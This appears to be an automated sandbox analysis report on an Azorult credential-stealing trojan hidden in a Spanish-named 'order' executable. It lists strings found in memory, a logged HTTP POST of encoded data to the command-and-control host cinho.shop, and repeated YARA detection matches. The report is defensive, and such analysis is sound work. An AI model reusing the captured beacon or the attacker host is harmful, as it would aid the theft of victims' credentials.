Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, cvtres.exe, 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://www.cyberlink.com0
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://www.cyberlink.com0/
Source: NUEVA ORDEN-MATSA 10-2022,.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, cvtres.exe, 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dotbit.me/a/
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

HTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: cinho.shopContent-Length: 95Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 62 ec 47 14 8b 30 6d eb 26 66 9c 26 67 ea 26 66 98 26 66 97 26 66 99 42 16 8b 30 62 ef 47 70 9c 47 11 8b 30 65 e8 41 17 ec 45 17 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0bG0m&f&g&f&f&fB0bGpG0eAE

Source: unknown

DNS traffic detected: queries for: cinho.shop

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 1_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

1_2_00418688

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
